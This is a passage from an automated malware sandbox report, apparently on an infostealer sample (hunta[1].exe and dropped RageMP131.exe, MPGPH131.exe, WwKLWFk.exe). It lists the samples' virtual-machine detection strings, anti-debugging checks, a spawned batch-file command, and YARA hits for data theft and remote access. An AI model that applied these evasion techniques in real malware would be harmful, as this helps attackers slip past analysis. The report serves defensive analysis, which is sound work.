Source: RageMP131.exe, 00000018.00000002.3735277102.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}/:VN)
Source: Amcache.hve.4.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: MPGPH131.exe, 0000000E.00000002.3734942241.0000000001091000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&z
Source: Amcache.hve.4.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: RageMP131.exe, RageMP131.exe, 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin
Source: RageMP131.exe, 00000015.00000002.3735676016.0000000000EC4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}a
Source: Amcache.hve.4.dr Binary or memory string: VMware, Inc.
Source: RageMP131.exe, 00000018.00000003.1589365836.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: MPGPH131.exe, 0000000E.00000002.3734942241.00000000010A3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_86D2EBBA2
Source: Amcache.hve.4.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: MPGPH131.exe, 0000000F.00000002.3734078403.00000000009FD000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}|
Source: Amcache.hve.4.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: hunta[1].exe, 00000002.00000002.3735222371.0000000001ACE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WARE\ACPI\DSDT\VBOX__G
Source: Amcache.hve.4.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: MPGPH131.exe, 0000000E.00000003.1382508816.00000000010A3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}X
Source: Amcache.hve.4.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: hunta[1].exe, 00000002.00000002.3735222371.0000000001B00000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000002.3734942241.0000000001091000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000018.00000002.3735277102.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr Binary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
Source: Amcache.hve.4.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: RageMP131.exe, 00000015.00000002.3735676016.0000000000E70000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000Fc
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`-
Source: WwKLWFk.exe, 00000004.00000002.1418971368.000000000116E000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000004.00000003.1288946208.0000000001188000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWL
Source: MPGPH131.exe, 0000000F.00000002.3734938152.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&>
Source: hunta[1].exe, 00000002.00000002.3735222371.0000000001B00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&<
Source: hunta[1].exe, 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmp, RageMP131.exe, 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\hunta[1].exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\hunta[1].exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\hunta[1].exe Thread information set: HideFromDebugger
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Thread information set: HideFromDebugger
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_059B0CB7 Start: 059B0C8C End: 059B0C88 2_2_059B0CB7
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_059B07B1 Start: 059B0A7B End: 059B077B 2_2_059B07B1
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_04E200D8 Start: 04E201A2 End: 04E200AA 24_2_04E200D8
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: SICE
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: SIWVID
Source: C:\Users\user\Desktop\hunta[1].exe Process queried: DebugPort
Source: C:\Users\user\Desktop\hunta[1].exe Process queried: DebugPort
Source: C:\Users\user\Desktop\hunta[1].exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_059B056A rdtsc 2_2_059B056A
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_01431044 mov eax, dword ptr fs:[00000030h] 2_2_01431044
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00E94AB0 mov eax, dword ptr fs:[00000030h] 2_2_00E94AB0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_008B1044 mov eax, dword ptr fs:[00000030h] 14_2_008B1044
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_00314AB0 mov eax, dword ptr fs:[00000030h] 14_2_00314AB0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_008B1044 mov eax, dword ptr fs:[00000030h] 15_2_008B1044
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_00314AB0 mov eax, dword ptr fs:[00000030h] 15_2_00314AB0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_00821044 mov eax, dword ptr fs:[00000030h] 21_2_00821044
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_00284AB0 mov eax, dword ptr fs:[00000030h] 21_2_00284AB0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_00821044 mov eax, dword ptr fs:[00000030h] 24_2_00821044
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_00284AB0 mov eax, dword ptr fs:[00000030h] 24_2_00284AB0
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\149657b0.bat" "
Source: hunta[1].exe, hunta[1].exe, 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
Source: SciTE.exe.4.dr Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
Source: C:\Users\user\Desktop\hunta[1].exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00F5C92A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 2_2_00F5C92A
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 4_2_0021139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId, 4_2_0021139F
Source: C:\Users\user\Desktop\hunta[1].exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.4.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: WwKLWFk.exe PID: 7456, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: WwKLWFk.exe PID: 1836, type: MEMORYSTR
Source: Yara match File source: 00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: hunta[1].exe PID: 7416, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 8104, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 8124, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 5640, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 4228, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: Process Memory Space: WwKLWFk.exe PID: 7456, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: WwKLWFk.exe PID: 1836, type: MEMORYSTR
Source: Yara match File source: 00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: hunta[1].exe PID: 7416, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 8104, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 8124, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 5640, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 4228, type: MEMORYSTR